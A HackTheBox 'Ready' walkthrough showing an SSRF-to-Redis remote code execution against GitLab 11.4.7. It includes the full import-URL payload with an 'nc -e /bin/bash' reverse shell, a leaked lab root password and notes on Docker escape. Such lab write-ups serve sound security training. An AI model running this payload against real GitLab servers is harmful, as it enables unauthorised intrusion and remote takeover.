May 15, 2021

5 min read

HackTheBox: (“Ready”) — Walkthrough

Hi People :D

Today we gonna solve “Ready” machine from HackTheBox, let’s GOOOOO :D

TL;DR
— — —

Ports 5080 and 22 are opened.
Navigate to the website on port 5080, it’s running GitLab Community Edition-11.4.7
After searching for an exploit to this gitlab version, I found RCE exploit that explained pretty good by LiveOverFlow video
By reproducing this bug, I got a git shell then I found a user flag in dude user directory
In /opt/backup directory, there’s a file called gitlab.rb that contains a root password
After I login as root, I found some docker configuration files so I realized that I am inside a docker container
I used one of the methods to escape this docker container then I got the root flag

Enumeration

— — — — — —

Start with Nmap

nmap -A 10.10.10.220

We have two open ports (22/5080) so let’s navigate to the website on port 5080

Web Enumeration

— — — — — — — —

We have a GitLab running on port 5080

First, make an account then login with it.

Then navigate directly to the help directory, why ?! ... That’s because most of the machines running an outdated version of GitLab that has a lot of bugs.

In our case, we have a GitLab-11.4.7, it’s an outdated version! so let’s search for exploitation

Exploitation

— — — — — —

I found This Awesome LiveOverFlow Video that explained how to exploit RCE in this GitLab version

I also found This GitHub repo that contains a PoC payload and a BurpSuite request sample

We just have to follow these steps to get a shell

First, we have to make a git repo by URL:

Home -> New Project -> Import project -> git repo by URL

Then in the Git repository URL field paste this line (as shown in the above github repo):

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git

Second, open BurpSuite ( or any HTTP interceptor program ) and click Create project

Now we have the required request, send it to Repeater so that we can test the exploit comfortably.

As shown in the PoC and the Burpsuite request sample, we have to paste this payload under project[import_url] parameter in order to get a shell (DO NOT delete the spaces):

multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash {Your_IP} 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
 exec

And we successfully got a shell as git :)

User Flag

— — — — —

After getting the shell, improve it a bit using :

python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=linux

Then move to the home directory, there’s a directory called dude and we are able to access it.

Fortunately, it contains the user flag :D

Root Flag

— — — — —

Let’s enumerate the files maybe we find something interesting.

The first place I often search in is the /opt directory because it contains packages and services files that not a part of the operating system distribution, but provided by an independent source.. these packages contain configuration files and backups that often have hardcoded creds in them.

As expected, there's a password in gitlab.rb file inside /opt/backup directory

Try this password (wW59U!ZKMbG9+*#h) with root and we successfully change to root user

If you notice, we are root but still in gitlab! ( root@gitlab ).

I immediately knew that I am in a docker container and I made sure when I found the docker configuration files (such as .dockerenv and .dockerinit).

So we need to escape from this docker container.

I found This Article talking about the ways to escape from docker containers, we can escape from it using the mounting method (as shown in the upper article)